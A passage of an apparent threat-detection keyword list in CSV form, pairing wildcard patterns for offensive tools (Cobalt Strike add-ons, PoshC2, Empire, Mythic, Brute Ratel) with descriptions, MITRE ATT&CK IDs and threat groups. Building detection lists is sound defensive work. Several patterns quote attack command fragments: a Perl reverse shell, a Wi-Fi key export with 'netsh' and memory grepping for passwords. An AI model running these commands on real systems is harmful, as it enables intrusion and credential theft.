- TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*statistically-likely-usernames*,offensive_tool_keyword,statistically-likely-usernames,This resource contains wordlists for creating statistically likely usernames for use in username-enumeration. simulated password-attacks and other security testing tasks.,T1210.001 - T1583.001 - T1583.002,TA0007 - ,N/A,N/A,Credential Access,https://github.com/insidetrust/statistically-likely-usernames,1,1,N/A,N/A,7,699,112,2022-08-31T20:27:53Z,2016-02-14T23:24:39Z -*StayKit.cna*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.cna*,offensive_tool_keyword,StayKit,StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1059 - T1053 - T1124,TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.exe*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*StayKit.git*,offensive_tool_keyword,cobaltstrike,StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Persistence,https://github.com/0xthirteen/StayKit,1,1,N/A,N/A,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -*STDIN->fdopen($c*r)*$~->fdopen($c*w)*system$_ while<>*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*Steal_Pipe_Token /PipeName*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*steal_token *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*steal_token(*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -*steal_token.py*,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,1,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*steal_token_access_mask*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*steal-cert.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*StealCookie-28050355-D9DF-4CE7-BFBC-4F7DDE890C2A.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*StealPowerAutomateToken-C4E7B7DA-54E4-49AB-B634-FCCD77C65025.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*Sticky-Keys-Slayer*,offensive_tool_keyword,Sticky-Keys-Slayer,Scans for accessibility tools backdoors via RDP,T1078 - T1015 - T1203,TA0003 - TA0007 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/linuz/Sticky-Keys-Slayer,1,1,N/A,N/A,4,319,80,2018-03-16T15:59:41Z,2016-08-06T18:55:28Z -*StickyNotesExtract.exe*,offensive_tool_keyword,sharpcollection,Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*stinger_client -*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,0,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stinger_client.py*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stinger_server.exe*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*stopdaisy*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*StopInveigh*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*-stop-keylogger*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,0,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*stop-keystrokes*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*stormshadow07*,offensive_tool_keyword,HackTheWorld,An Python Script For Generating Payloads that Bypasses All Antivirus so far,T1566 - T1106 - T1027 - T1059 - T1070,TA0002 - TA0005 - TA0008 - TA0011,N/A,N/A,Defense Evasion,https://github.com/stormshadow07/HackTheWorld,1,1,N/A,N/A,9,866,179,2020-04-28T20:17:54Z,2018-02-17T11:46:40Z -*STRING firefox about:logins*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*String netsh wlan export profile key=clear*,offensive_tool_keyword,wifigrabber,grab wifi password and exfiltrate to a given site,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*strings -n * /dev/mem | grep -i pass*,greyware_tool_keyword,grep,search for passwords in memory and core dumps,T1005 - T1083 - T1213,TA0006,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*strip_bof.ps1*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*strip2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*strip-bof -Path *,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,0,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*StrongLoader_x64.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*struts_ext_v2.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*su rootz*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*subbrute*,offensive_tool_keyword,subbrute,SubBrute is a community driven project with the goal of creating the fastest. and most accurate subdomain enumeration tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity. as SubBrute does not send traffic directly to the targets name servers.,T1210.001 - T1190 - T1574.001,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/TheRook/subbrute,1,1,N/A,N/A,10,3150,653,2022-01-13T09:25:59Z,2012-06-10T01:08:20Z -*subdomain_takeovers.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*subdomains-100.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-1000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-10000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-500.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-top1million-110000.txt*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,1,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*subdomains-top1million-20000.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*subdomains-uk-1000.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,0,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*subdomains-uk-500.txt*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - 